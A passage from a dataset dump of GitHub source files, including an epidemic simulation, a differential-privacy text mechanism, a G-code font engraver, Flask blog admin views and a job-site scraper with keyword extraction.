+ ra ** 2 - 2.0 * ra * k) - rb\n\n\ndef disk_sdf(p, r=0.25):\n return np.sqrt(p[:, 0] ** 2 + p[:, 1] ** 2) - r\n","repo_name":"rgl-epfl/differentiable-sdf-rendering","sub_path":"python/sdf2d/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":7783,"program_lang":"python","lang":"en","doc_type":"code","stars":810,"dataset":"github-code","pt":"36"} +{"seq_id":"72167499943","text":"import numpy as np\nimport Person\nimport Population\nimport Interaction_Sites\nimport Policy\n\n# will_go_to_site parameters (prob person will go somewhere each day)\nA_WILL_GO_PROB = .05\nB_WILL_GO_PROB = .4\nC_WILL_GO_PROB = .8\nTESTS_PER_DAY = 100\n\n# Polciy variables\ninitial_mask_mandate, initial_lockdown_mandate = False, False\nlockdown_trigger, lockdown_day_trigger = None, 25\nmask_trigger, mask_day_trigger = None, 25\n\ndef RunEpidemic(nPop, n0, nDays):\n # Initalize the policy class\n policy = Policy.Policy(initial_mask_mandate=initial_mask_mandate, initial_lockdown_mandate=initial_lockdown_mandate, \n mask_trigger=mask_trigger, mask_day_trigger=mask_day_trigger, \n lockdown_trigger=lockdown_trigger, lockdown_day_trigger=lockdown_day_trigger)\n \n old_mask_mandate, old_lockdown = initial_mask_mandate, initial_lockdown_mandate\n \n # Initialize the population\n pop = Population.Population(nPop, n0, policy=policy)\n \n # Initalize the interaction sites\n inter_sites = Interaction_Sites.Interaction_Sites(pop_obj=pop)\n \n # Link the pop and inter_sites to the policy class\n policy.set_simulation(population=pop, interaction_sites=inter_sites)\n\n # Arrays to store the values during the simulation\n track_new_infected = np.zeros(nDays, dtype=int) # new infections\n track_infected = np.zeros(nDays, dtype=int) # currently infected\n track_susceptible = np.zeros(nDays, dtype=int) # never been exposed\n track_recovered = np.zeros(nDays, dtype=int) # total recovered\n track_dead = np.zeros(nDays, dtype=int) # total deaths\n track_tested = np.zeros(nDays, dtype=int) # total tested individuals\n track_quarantined = np.zeros(nDays, dtype=int) # population currently in quarantine ACTUALLY DOES TOTAL QUARINTIED \n\n # Loop over the number of days\n for day in range(nDays):\n\n #Count all the different states of people\n track_infected[day] = pop.count_infected()\n track_susceptible[day] = pop.count_susceptible()\n track_recovered[day] = pop.count_recovered()\n track_dead[day] = pop.count_dead()\n track_tested[day] = pop.count_tested()\n track_quarantined[day] = pop.count_quarantined()\n\n #track the days someone has been infected?\n if day != 0:\n new_recovered = track_recovered[day] - track_recovered[day-1]\n new_dead = track_dead[day] - track_dead[day-1]\n track_new_infected[day] = track_infected[day] - track_infected[day-1] + new_recovered + new_dead\n\n # Find grade A, B, C site visits\n will_visit_A = inter_sites.will_visit_site(inter_sites.get_grade_A_sites(), A_WILL_GO_PROB)\n will_visit_B = inter_sites.will_visit_site(inter_sites.get_grade_B_sites(), B_WILL_GO_PROB)\n will_visit_C = inter_sites.will_visit_site(inter_sites.get_grade_C_sites(), C_WILL_GO_PROB)\n\n # Do site interactions based on who is going to sites - INFECTION SPREAD OCCURS HERE\n inter_sites.site_interaction(will_visit_A, day)\n #inter_sites.site_interaction(will_visit_B, inter_sites.get_grade_B_sites(), day)\n #inter_sites.site_interaction(will_visit_C, inter_sites.get_grade_C_sites(), day)\n\n # Manage at home interactions\n inter_sites.house_interact(day)\n\n #Manage testing sites\n inter_sites.testing_site(TESTS_PER_DAY, day)\n\n # See who needs to be cured or die\n infected_people = pop.get_infected()\n for index in infected_people:\n infected_person = pop.get_person(index=index)\n\n if infected_person.get_case_severity() == \"Death\":\n is_dead = infected_person.check_dead(day)\n if is_dead and pop.update_dead(index=infected_person.get_index()) == False:\n print(\"Did not die correctly\")\n\n else:\n is_cured = infected_person.check_cured(day) # method will check and cure them if needed ALWAYS IS FALSE??\n if is_cured and pop.update_cured(index=infected_person.get_index()) == False:\n print(\"Did not cure correctly\")\n\n is_quarantined = infected_person.check_quarantine(day)\n\n print(\"Day: {}, infected: {}, recovered: {}, suceptible: {}, dead: {}, tested: {} total quarantined: {}\".format(day, track_infected[day],\n track_recovered[day],\n track_susceptible[day],\n track_dead[day],\n track_tested[day],\n track_quarantined[day]))\n print(\"At the end, \", track_susceptible[-1], \"never got it\")\n print(track_dead[-1], \"died\")\n print(np.max(track_infected), \"had it at the peak\")\n print(track_tested[day], \"have been tested\")\n print (np.max(track_quarantined), \"were in quarantine at the peak\")\n\n return track_infected, track_new_infected, track_recovered, track_susceptible, track_dead, track_tested, track_quarantined, Population\n","repo_name":"Queens-Physics/quaboom","sub_path":"old_sim_files/interaction_MC.py","file_name":"interaction_MC.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"43326016","text":"import re\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport gensim.downloader as api\nfrom nltk.tokenize import word_tokenize\nfrom sacremoses import MosesDetokenizer\nfrom sklearn.neighbors import NearestNeighbors\nfrom torch import Tensor\nfrom typing import Tuple\n\n\nfrom gensim.models import Word2Vec\n\nimport pandas as pd\nfrom typing import List\n\nimport nltk\n\nnltk.download(\"punkt\")\nbeta = 0.001\nhtml_cleaner = re.compile(\"<.*?>\")\nmodel_gigaword = api.load(\"glove-wiki-gigaword-50\")\n\n\ndef get_threshold(beta: float, epsilon: float, model: Word2Vec) -> float:\n \"\"\"\n Calculate the threshold (gamma) for the Truncated Exponential Mechanism.\n\n Args:\n beta (float): The privacy parameter beta.\n epsilon (float): The privacy parameter epsilon.\n model (Word2Vec): The word embedding model.\n\n Returns:\n float: The threshold (gamma) for the Truncated Exponential Mechanism.\n \"\"\"\n vocab_size = len(model.vectors)\n x = ((1 - beta) / beta) * (vocab_size - 1)\n gamma = (2 / epsilon) * np.log(x)\n return gamma\n\n\ndef radius_neighbors(\n vectors: Tensor, vector: Tensor, radius: float\n) -> Tuple[Tensor, Tensor]:\n \"\"\"\n Find neighbors within a given radius of a target vector in a set of vectors.\n\n Args:\n vectors (Tensor): The set of vectors to search within.\n vector (Tensor): The target vector for which neighbors are sought.\n radius (float): The search radius to find neighbors.\n\n Returns:\n Tuple[Tensor, Tensor]: A tuple containing two tensors:\n - dists (Tensor): Distances of the neighbors from the target vector.\n - ids (Tensor): Indices of the neighbors in the input vectors.\n \"\"\"\n x = torch.linalg.norm(vectors - vector, axis=-1)\n in_radius = x < radius\n dists, ids = x[in_radius], (in_radius).nonzero()[:, 0]\n return dists, ids\n\n\ndef truncated_exponential_mechanism(\n word: str,\n model: Word2Vec,\n cuda_vectors: torch.Tensor,\n gumbel_sampler: torch.distributions.Gumbel,\n gamma: float,\n epsilon: float,\n):\n \"\"\"\n Apply the truncated exponential mechanism to generate a differentially private word.\n\n Args:\n word (str): The input word.\n model (gensim.models.keyedvectors.Word2VecKeyedVectors): The word embedding model.\n cuda_vectors (torch.Tensor): Word embeddings as torch Tensor on GPU.\n gumbel_sampler (torch.distributions.Gumbel): Gumbel noise sampler.\n gamma (float): The threshold for the truncated exponential mechanism.\n epsilon (float): The privacy parameter.\n\n Returns:\n str: The differentially private word.\n \"\"\"\n\n vector = cuda_vectors[model.key_to_index[word], None]\n dists, ids = radius_neighbors(cuda_vectors, vector, gamma)\n assert dists.shape == ids.shape\n\n threshold = gamma\n vocab_size = len(model.vectors)\n out_of_threshold_size = torch.tensor([vocab_size - len(dists)])\n\n perp_score = -1 * threshold + 2 * (torch.log(out_of_threshold_size) / epsilon)\n scores = -1 * dists\n scores = torch.hstack([scores, perp_score.cuda()])\n\n noises = gumbel_sampler.sample((len(dists) + 1,))[:, 0]\n assert noises.shape == scores.shape\n\n noisy_scores = scores + noises\n max_idx = torch.argmax(noisy_scores).item()\n\n if max_idx == len(noisy_scores) - 1:\n support = np.setdiff1d(np.arange(vocab_size), ids.cpu().numpy())\n assert len(support) == out_of_threshold_size\n private_word_id = np.random.choice(support)\n else:\n private_word_id = ids[max_idx]\n private_word = model.index_to_key[private_word_id]\n return private_word\n\n\ndef tem_review(\n review: str,\n model: Word2Vec,\n cuda_vectors: torch.Tensor,\n gumbel_sampler: torch.distributions.Gumbel,\n gamma: float,\n html_cleaner: re.Pattern,\n epsilon: float,\n):\n \"\"\"\n Apply the Truncated Exponential Mechanism (TEM) to a text review to generate a differentially private version.\n\n Args:\n review (str): The input text review.\n model (gensim.models.keyedvectors.Word2VecKeyedVectors): The word embedding model.\n cuda_vectors (torch.Tensor): Word embeddings as a torch Tensor on GPU.\n gumbel_sampler (torch.distributions.Gumbel): Gumbel noise sampler.\n gamma (float): The threshold for the truncated exponential mechanism.\n html_cleaner (re.Pattern): Regular expression pattern for cleaning HTML tags.\n epsilon (float): The privacy parameter.\n\n Returns:\n str: The differentially private version of the input review.\n \"\"\"\n review = word_tokenize(re.sub(html_cleaner, \"\", review.lower()))\n priv_words = []\n\n for word in review:\n if word in model.key_to_index:\n priv_word = truncated_exponential_mechanism(\n word=word,\n model=model,\n cuda_vectors=cuda_vectors,\n gumbel_sampler=gumbel_sampler,\n gamma=gamma,\n epsilon=epsilon,\n )\n priv_words.append(priv_word)\n\n priv_review = MosesDetokenizer().detokenize(priv_words, return_str=True)\n return priv_review\n\n\ndef tem_df(\n df: pd.DataFrame, model: Word2Vec, epsilon_list: List[float], save_path: str\n) -> pd.DataFrame:\n \"\"\"\n Apply the Truncated Exponential Mechanism (TEM) to a DataFrame of text reviews with varying epsilon values.\n\n Args:\n df (pd.DataFrame): The DataFrame containing the text reviews.\n model (gensim.models.keyedvectors.Word2VecKeyedVectors): The word embedding model.\n epsilon_list (List[float]): A list of epsilon values for differential privacy.\n save_path (str): The path to save the results CSV file.\n\n Returns:\n pd.DataFrame: A DataFrame containing the differentially private versions of text reviews.\n \"\"\"\n\n cuda_vectors = torch.from_numpy(model.vectors).float().cuda()\n private_df_list = []\n for epsilon in epsilon_list:\n gamma = get_threshold(beta=beta, epsilon=epsilon, model=model)\n mean = torch.tensor([0.0]).cuda()\n scale = torch.tensor([2 / epsilon]).cuda()\n gumbel_sampler = torch.distributions.gumbel.Gumbel(mean, scale)\n\n private_df_eps = df[\"review\"].progress_apply(\n lambda review: tem_review(\n review=review,\n model=model,\n cuda_vectors=cuda_vectors,\n gumbel_sampler=gumbel_sampler,\n gamma=gamma,\n html_cleaner=html_cleaner,\n epsilon=epsilon,\n )\n )\n private_df_list.append(private_df_eps)\n\n private_df = pd.DataFrame(\n zip(*private_df_list),\n columns=[f\"tem_eps={epsilon}\" for epsilon in epsilon_list],\n )\n\n private_df.to_csv(save_path, index=False)\n return private_df\n","repo_name":"SaitejaUtpala/dp_prompt","sub_path":"mechanisms/wordlevel/tem.py","file_name":"tem.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"38552330303","text":"class S_Node:\n def __init__(self, value):\n self.value = value\n self.N_node = None\n\n\na = S_Node(1)\nb = S_Node(2)\nc = S_Node(3)\n\na.N_node = b\nb.N_node = c\nprint(b.N_node.value)\n\n\n# ---------------------------------------------------\n# Doubly linked-list\nclass D_Node:\n def __init__(self, value):\n self.value = value\n self.N_node = None\n self.P_node = None\n\n\nd = S_Node(4)\ne = S_Node(5)\nf = S_Node(6)\ng = S_Node(7)\n\nd.P_node = None\nd.N_node = e\n\ne.P_node = d\ne.N_node = f\n\nf.P_node = d\nf.N_node = g\n\ng.P_node = f\ng.N_node = None\n\nprint(d.N_node.N_node.N_node.value)\n","repo_name":"pro-ghanem/MY-DSA-Problem-Solving","sub_path":"Linked_Array/singly and double linked-list.py","file_name":"singly and double linked-list.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"40200848443","text":"from Tkinter import *\nfrom math import *\nimport os\nimport re\nimport sys\nimport string\nimport getopt\nimport math\n\nString = \"\"\nSafeZ = 2\nXStart = 0\nXLineOffset = 0\nXIndentList = \"\"\nYStart = 0\nYLineOffset = 0\nDepth = 0.1\nXScale = 1\nYScale = 1\nCSpaceP = 25\nWSpaceP= 100\nAngle = 0\nMirror = 0\nFlip = 0\nstringlist = []\n\n#=======================================================================\nclass Character:\n def __init__(self, key):\n self.key = key\n self.stroke_list = []\n\n def __repr__(self):\n return \"%s\" % (self.stroke_list)\n\n def get_xmax(self):\n try: return max([s.xmax for s in self.stroke_list[:]])\n except ValueError: return 0\n\n def get_ymax(self):\n try: return max([s.ymax for s in self.stroke_list[:]])\n except ValueError: return 0\n\n\n\n#=======================================================================\nclass Line:\n\n def __init__(self, coords):\n self.xstart, self.ystart, self.xend, self.yend = coords\n self.xmax = max(self.xstart, self.xend)\n self.ymax = max(self.ystart, self.yend)\n\n def __repr__(self):\n return (\"Line([%s, %s, %s, %s])\" % (self.xstart, self.ystart, self.xend, self.yend))\n\n#=======================================================================\nclass GCodeGenerator:\n \n def generateGCode(self, text, fontName):\n #erase old gcode as needed\n gcode = [] \n oldx = oldy = -99990.0 \n \n gcode.append( 'G0 Z%.4f~' %(SafeZ))\n font = self.parse(fontName)\n\n font_line_height = max(font[key].get_ymax() for key in font)\n font_word_space = max(font[key].get_xmax() for key in font) * (WSpaceP/100.0)\n font_char_space = font_word_space * (CSpaceP /100.0)\n\n xoffset = 0 # distance along raw string in font units\n # calc a plot scale so we can show about first 15 chars of string\n # in the preview window\n PlotScale = 15 * font['A'].get_xmax() * XScale / 150\n\n for char in text:\n if char == ' ':\n xoffset += font_word_space\n continue\n try:\n first_stroke = True\n for stroke in font[char].stroke_list:\n # gcode.append(\"(%f,%f to %f,%f)\" %(stroke.xstart,stroke.ystart,stroke.xend,stroke.yend ))\n dx = oldx - stroke.xstart\n dy = oldy - stroke.ystart\n dist = sqrt(dx*dx + dy*dy)\n\n x1 = stroke.xstart + xoffset\n y1 = stroke.ystart\n if Mirror == 1:\n x1 = -x1\n if Flip == 1:\n y1 = -y1\n\n # check and see if we need to move to a new discontinuous start point\n if (dist > 0.001) or first_stroke:\n first_stroke = False\n #lift engraver, rapid to start of stroke, drop tool\n gcode.append(\"G0 Z%.4f~\" %(SafeZ))\n gcode.append(self.getGCode(0, x1, y1, XStart, YStart))\n gcode.append(\"G1 Z%.4f~\" %(Depth))\n\n x2 = stroke.xend + xoffset\n y2 = stroke.yend\n if Mirror == 1:\n x2 = -x2\n if Flip == 1:\n y2 = -y2\n gcode.append(self.getGCode(1, x2, y2, XStart, YStart))\n oldx, oldy = stroke.xend, stroke.yend\n\n # move over for next character\n char_width = font[char].get_xmax()\n xoffset += font_char_space + char_width\n\n except KeyError:\n print(\"(warning: character '0x%02X' not found in font defn)\" % ord(char))\n\n gcode.append(\"G0 Z%.4f~\" %(SafeZ)) # final engraver up\n return gcode\n \n def parse(self, fontName):\n font = {}\n key = None\n num_cmds = 0\n line_num = 0\n fileContents = []\n with open(\"fonts/%s.cxf\" %(fontName)) as file:\n fileContents = file.readlines()\n for text in fileContents:\n #format for a typical letter (lowercase r):\n ##comment, with a blank line after it\n #\n #[r] 3\n #L 0,0,0,6\n #L 0,6,2,6\n #A 2,5,1,0,90\n #\n line_num += 1\n end_char = re.match('^$', text) #blank line\n if end_char and key: #save the character to our dictionary\n font[key] = Character(key)\n font[key].stroke_list = stroke_list\n font[key].xmax = xmax\n if (num_cmds != cmds_read):\n print (\"(warning: discrepancy in number of commands %s, line %s, %s != %s )\" % (fontfile, line_num, num_cmds, cmds_read))\n\n new_cmd = re.match('^\\[(.*)\\]\\s(\\d+)', text)\n if new_cmd: #new character\n key = new_cmd.group(1)\n num_cmds = int(new_cmd.group(2)) #for debug\n cmds_read = 0\n stroke_list = []\n xmax, ymax = 0, 0\n\n line_cmd = re.match('^L (.*)', text)\n if line_cmd:\n cmds_read += 1\n coords = line_cmd.group(1)\n coords = [float(n) for n in coords.split(',')]\n stroke_list += [Line(coords)]\n xmax = max(xmax, coords[0], coords[2])\n\n arc_cmd = re.match('^A (.*)', text)\n if arc_cmd:\n cmds_read += 1\n coords = arc_cmd.group(1)\n coords = [float(n) for n in coords.split(',')]\n xcenter, ycenter, radius, start_angle, end_angle = coords\n # since font defn has arcs as ccw, we need some font foo\n if ( end_angle < start_angle ):\n start_angle -= 360.0\n # approximate arc with line seg every 20 degrees\n segs = int((end_angle - start_angle) / 20) + 1\n angleincr = (end_angle - start_angle)/segs\n xstart = cos(start_angle * pi/180) * radius + xcenter\n ystart = sin(start_angle * pi/180) * radius + ycenter\n angle = start_angle\n for i in range(segs):\n angle += angleincr\n xend = cos(angle * pi/180) * radius + xcenter\n yend = sin(angle * pi/180) * radius + ycenter\n coords = [xstart,ystart,xend,yend]\n stroke_list += [Line(coords)]\n xmax = max(xmax, coords[0], coords[2])\n ymax = max(ymax, coords[1], coords[3])\n xstart = xend\n ystart = yend\n return font\n \n def getGCode(self, z, x, y, xStart, yStart):\n xScale = 0.4000\n yScale = 0.5000\n angle = 0.0000\n rotatedX = 0.0000\n rotatedY = 0.0000\n \n scaledX = x*xScale\n scaledY = y*yScale\n distanceOfXYFromZero = math.sqrt(((scaledX*scaledX) + (scaledY*scaledY)))\n if x != 0:\n directionToXY = math.atan(scaledY/scaledX)\n rotatedX = distanceOfXYFromZero * (math.cos((directionToXY + angle)))\n rotatedY = distanceOfXYFromZero * (math.sin((directionToXY + angle)))\n \n if z < 0.5:\n return \"G00 X%.4f Y%.4f~\" %((rotatedX + xStart), (rotatedY + yStart))\n else:\n return \"G01 X%.4f Y%.4f~\" %((rotatedX + xStart), (rotatedY + yStart))\n","repo_name":"BuzyFranklin/WriteBot","sub_path":"GCodeGenerator.py","file_name":"GCodeGenerator.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"42491256944","text":"from flask import abort, flash, render_template, redirect, url_for, current_app as app\nfrom sqlalchemy.exc import IntegrityError\n\nfrom . import admin\nfrom .forms import AuthorForm, CategoryForm, EntryForm\n\nfrom demo_app import db\nfrom demo_app.blog.models import Author, Category, Entry\n\n@admin.route('/', methods=['GET'])\ndef index():\n return render_template('admin/index.html')\n\n# Author views\n@admin.route('/authors', methods=['GET'])\n@admin.route('/authors/', methods=['GET'])\ndef authors(page=1):\n authors = Author.query.order_by('id').paginate(page, app.config['PER_PAGE'], False)\n return render_template('admin/authors/author_list.html', authors=authors)\n\n@admin.route('/authors/detail/', methods=['GET'])\ndef author_detail(author_id):\n author = Author.query.filter_by(id=author_id).first()\n if author is not None:\n return render_template('admin/authors/author_detail.html', author=author)\n return abort(404)\n\n@admin.route('/authors/create', methods=['GET', 'POST'])\ndef author_create():\n form = AuthorForm()\n try:\n if form.validate_on_submit():\n author = Author(\n name = form.name.data,\n description = form.description.data,\n email = form.email.data\n )\n db.session.add(author)\n db.session.commit()\n flash('Author has been successfully created')\n return redirect(url_for('admin.authors'))\n except IntegrityError:\n db.session.rollback()\n flash('Email must be unique')\n return render_template('admin/authors/author_create.html', form=form), 404\n return render_template('admin/authors/author_create.html', form=form)\n\n@admin.route('/authors/update/', methods=['GET', 'POST'])\ndef author_update(author_id):\n author = Author.query.filter_by(id=author_id).first()\n if author is None:\n return abort(404)\n form = AuthorForm(obj=author)\n try:\n if form.validate_on_submit():\n if form.name:\n author.name = form.name.data\n if form.description:\n author.description = form.description.data\n if form.email:\n author.email = form.email.data\n db.session.commit()\n flash('Author has been successfully updated')\n return redirect(url_for('admin.authors'))\n except IntegrityError:\n db.session.rollback()\n flash('Author email must be unique')\n return render_template('admin/authors/author_update.html', form=form, author=author), 404\n return render_template('admin/authors/author_update.html', form=form, author=author)\n\n@admin.route('/authors/delete/', methods=['GET'])\ndef author_delete(author_id):\n author = Author.query.filter_by(id=author_id).first()\n if author is None:\n return abort(404)\n db.session.delete(author)\n db.session.commit()\n flash('Author has been successfully deleted')\n return redirect(url_for('admin.authors'))\n\n# Category views\n@admin.route('/categories', methods=['GET'])\n@admin.route('/categories/', methods=['GET'])\ndef categories(page=1):\n categories = Category.query.order_by('id').paginate(page, app.config['PER_PAGE'], False)\n return render_template('admin/categories/category_list.html', categories=categories)\n \n@admin.route('/categories/create', methods=['GET', 'POST'])\ndef category_create():\n form = CategoryForm()\n try:\n if form.validate_on_submit():\n category = Category(\n name = form.name.data\n )\n db.session.add(category)\n db.session.commit()\n flash('Category has been successfully created')\n return redirect(url_for('admin.categories'))\n except IntegrityError:\n db.session.rollback()\n flash('Category name must be unique')\n return render_template('admin/categories/category_create.html', form=form), 404\n return render_template('admin/categories/category_create.html', form=form)\n\n@admin.route('/categories/update/', methods=['GET', 'POST'])\ndef category_update(category_id):\n category = Category.query.filter_by(id=category_id).first()\n if category is None:\n return abort(404)\n form = CategoryForm(obj=category)\n try:\n if form.validate_on_submit():\n if form.name:\n category.name = form.name.data\n db.session.commit()\n flash('Category has been successfully updated')\n return redirect(url_for('admin.categories'))\n except IntegrityError:\n db.session.rollback()\n flash('Category name must be unique')\n return render_template('admin/categories/category_update.html', form=form, category=category), 404\n return render_template('admin/categories/category_update.html', form=form, category=category)\n\n@admin.route('/categories/delete/', methods=['GET'])\ndef category_delete(category_id):\n category = Category.query.filter_by(id=category_id).first()\n if category is None:\n return abort(404)\n db.session.delete(category)\n db.session.commit()\n flash('Category has been successfully deleted')\n return redirect(url_for('admin.categories'))\n\n# Entry views\n@admin.route('/entries', methods=['GET'])\n@admin.route('/entries/', methods=['GET'])\ndef entries(page=1):\n entries = Entry.query.order_by('id').paginate(page, app.config['PER_PAGE'], False)\n return render_template('admin/entries/entry_list.html', entries=entries)\n\n@admin.route('/entries/detail/', methods=['GET'])\ndef entry_detail(entry_id):\n entry = Entry.query.filter_by(id=entry_id).first()\n if entry is not None:\n return render_template('admin/entries/entry_detail.html', entry=entry)\n return abort(404)\n\n@admin.route('/entries/create', methods=['GET', 'POST'])\ndef entry_create():\n form = EntryForm()\n if form.validate_on_submit():\n entry = Entry(\n title = form.title.data,\n body = form.body.data,\n author=form.author.data,\n )\n for c in form.category.data:\n entry.en_ca.append(c)\n db.session.add(entry)\n db.session.commit()\n flash('Entry has been successfully created')\n return redirect(url_for('admin.entries'))\n return render_template('admin/entries/entry_create.html', form=form)\n\n@admin.route('/entries/update/', methods=['GET', 'POST'])\ndef entry_update(entry_id):\n entry = Entry.query.filter_by(id=entry_id).first()\n if entry is None:\n return abort(404)\n form = EntryForm(obj=entry)\n if form.validate_on_submit():\n if form.title:\n entry.title = form.title.data\n if form.body:\n entry.body = form.body.data\n if form.author:\n entry.author = form.author.data\n if form.category.data:\n entry.refresh_categories()\n for c in form.category.data:\n entry.en_ca.append(c)\n db.session.commit()\n flash('Entry has been successfully updated')\n return redirect(url_for('admin.entries'))\n return render_template('admin/entries/entry_update.html', form=form, entry=entry)\n\n@admin.route('/entries/delete/', methods=['GET'])\ndef entry_delete(entry_id):\n entry = Entry.query.filter_by(id=entry_id).first()\n if entry is None:\n return abort(404)\n db.session.delete(entry)\n db.session.commit()\n flash('Entry has been successfully deleted')\n return redirect(url_for('admin.entries'))","repo_name":"AlexPG/flask-demo-app","sub_path":"demo_app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1532504633","text":"# coding:utf-8\n# 这里面是爬猎聘网的代码\n# @auther jinyu\n# @date 2020-09-24\n\nimport requests\nimport random\nimport re\nimport os\nimport time\nimport pandas as pd\nimport jieba\nfrom jieba import analyse\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\n\nfrom SpiderData import *\n\n\nclass MySpider:\n # 爬虫-猎聘网\n\n targetName = 'liepin'\n\n targetDir = '/docs/data/'\n\n # 猎聘网基础url\n url = 'https://www.liepin.com/zhaopin/?'\n # 待爬取的职位\n jobs = ['数据挖掘', '图像算法工程师', 'java后端', '互联网产品经理']\n # 待爬取的城市,和对应的dqs\n citys = ['北京', '上海', '深圳', '广州', '武汉', '杭州']\n cityIds = ['010', '020', '050090', '050020', '170020', '070020']\n\n # 用于匹配职位链接的Regular express\n regExpUrl = ']*href=\\\"(https://www.liepin.com/job[^\"]*)\\\"[^>]*'\n # 用于匹配职位\n regExpRequire = '
        [\\s\\S]*?(?<=任职资格|任职要求)[::]?([\\s\\S]*?)(?<=
        )?
        '\n\n def __init__(self) -> None:\n self.init()\n\n def UA(self):\n \"\"\" 随机生成合适的UA,用于设置爬虫的参数 \"\"\"\n ua = random.choice(uapools)\n return {'User-Agent': ua}\n\n def init(self):\n if(not os.path.exists(os.getcwd()+'/spider/data')):\n os.mkdir(os.getcwd()+'/spider/data')\n\n def run(self):\n # 爬取职位详情\n\n try:\n for job in self.jobs:\n # 选择不同的城市e\n print('当前职位:', job)\n\n url_target = self.url+'key='+job\n\n f = open(os.getcwd()+'/spider/data/' +\n self.targetName+'_Job-'+job+'.csv', 'w')\n f.write('\"url\",\"city\"\\n')\n\n for i in range(len(self.citys)):\n # 选择不同的城市\n\n # 当前已经爬取的职位\n jobNum = 0\n\n # 当前的爬取页面\n curPage = 0\n\n while jobNum < 100:\n url_target_final = url_target+'&dqs=' + \\\n self.cityIds[i]+'&curPage='+str(curPage)\n\n print('当前爬取的url:', url_target_final)\n\n # 通过requests的get方法爬取数据,自动切换User-agents\n data_orgin = requests.get(\n url=url_target_final, headers=self.UA())\n\n # 将爬取到的信息用utf-8编码\n data_html = data_orgin.content.decode(\"utf-8\")\n\n # 判断是是否成功爬取到了html内容\n if '' in data_html and job in data_html:\n print('get data success!')\n else:\n print('get data failed!')\n\n # 通过正则表达式获取职位url\n data_reGet = re.compile(\n self.regExpUrl).findall(data_html)\n\n for url_a in data_reGet:\n print(url_a)\n f.write(url_a+' , '+self.citys[i]+' \\n')\n jobNum = jobNum+1\n time.sleep(0.01)\n\n curPage = curPage+1\n if curPage > 20:\n jobNum = 1000\n time.sleep(random.randint(1, 4))\n f.close()\n\n except IOError:\n print('无法建立csv文件')\n except Exception as e:\n print(e.args)\n finally:\n print('Get url finish!')\n\n print('run end')\n\n def run_getDetail(self):\n # 获取职位细节\n\n # 最多爬的url\n maxNum = 5\n\n for job in self.jobs:\n # 遍历各个职位\n print('当前职位:', job)\n\n for city in self.citys:\n try:\n csvData = pd.read_csv(\n os.getcwd()+'/spider/data/'+self.targetName+'_Job-'+job+'.csv')\n\n f = open(os.getcwd()+'/spider/data/' +\n self.targetName+'_require-'+job+'_city-'+city+'.txt', 'w')\n\n numOfUrl = 0\n\n for i in range(csvData.shape[0]):\n\n if numOfUrl > maxNum:\n break\n\n # 判断当前是否到了当前城市\n if(not city in csvData.city[i]):\n continue\n\n numOfUrl = numOfUrl+1\n\n url_target_final = csvData.url[i]\n\n url_target_final = str(\n url_target_final).replace(' ', '')\n\n # 通过requests的get方法爬取数据,自动切换User-agents\n data_orgin = requests.get(\n url=url_target_final, headers=self.UA())\n\n # 将爬取到的信息用utf-8编码\n data_html = data_orgin.content.decode(\"utf-8\")\n\n # 判断是是否成功爬取到了html内容\n if '' in data_html and job in data_html:\n print('get '+url_target_final+'data success!')\n else:\n print('get '+url_target_final+' data failed!')\n\n # 通过正则表达式获取职位要求\n data_reGet = re.compile(\n self.regExpRequire).findall(data_html)\n\n # 输出匹配到的结果\n for data_detail in data_reGet:\n theStr = str(data_detail)\n if(theStr != ''):\n theStr = theStr.replace('
        ', '\\n')\n f.write(theStr)\n print(theStr)\n time.sleep(0.1)\n\n time.sleep(random.randint(1, 5)*0.1)\n f.close()\n except IOError:\n print('找不到职位的csv文件,请先运行run()方法')\n except Exception as e:\n print(e.args)\n finally:\n print('Get detail finish!')\n\n print('run_getDetail end')\n\n def processData(self):\n # 对职位细节进行数据清洗\n\n # 词云关键词提取权重,越小越少\n MyTopK = 200\n\n # 只包含指定词性的词\n MyAllowPOS = ('n','nr','ns','nt','nw','nz','s','f','t','t','an')\n\n try:\n for job in self.jobs:\n\n print('当前职位:', job)\n\n for city in self.citys:\n\n f = open(os.getcwd()+'/spider/data/' +\n self.targetName+'_keyword-'+job+'_city-'+city+'.txt', 'w')\n\n str_jobRequire = str()\n\n with open(os.getcwd()+'/spider/data/' +\n self.targetName+'_require-'+job+'_city-'+city+'.txt') as txtFile:\n while(True):\n str_line = txtFile.readline()\n\n if not str_line:\n break\n\n str_jobRequire = str_jobRequire+str_line\n\n str_jobRequire = str_jobRequire.replace('\\n\\n', '\\n')\n str_jobRequire = str_jobRequire.replace(' ', '')\n\n # 去除序号与结尾\n str_jobRequire = re.sub(\n r'([0-9 a-z]+[\\.\\、,,))])|( [0-9]+ )|[;;]', '', str_jobRequire)\n\n # 去除不重要的标点\n str_jobRequire = re.sub(r'[,、。【】()/]', ' ', str_jobRequire)\n\n # 结巴分词\n # keywords = jieba.cut(str_jobRequire,cut_all=False)\n\n # TF-IDF\n TF_IDF = analyse.extract_tags\n keywords = TF_IDF(str_jobRequire, topK=MyTopK,allowPOS=MyAllowPOS)\n\n num_word = 0\n\n for key in keywords:\n print(key, end=' ')\n num_word = num_word+1\n f.write(key+' ')\n if num_word % 10 == 0:\n f.write('\\n')\n\n f.write('\\n')\n\n print('\\n\\n')\n\n f.close()\n\n time.sleep(0.1)\n except IOError as e:\n print('无法打开职位细节文件,请提前运行run_getDetail()')\n except Exception as e:\n print(e.args)\n finally:\n print('processData finish!')\n\n print('processData end')\n\n def createWordCloud(self):\n try:\n for job in self.jobs:\n for city in self.citys:\n\n with open(os.getcwd()+'/spider/data/' +\n self.targetName+'_keyword-'+job+'_city-'+city+'.txt', 'r') as txtFile:\n str_keyword = str()\n\n while(True):\n str_line = txtFile.readline()\n if not str_line:\n break\n if str_line == '':\n continue\n str_keyword = str_keyword + 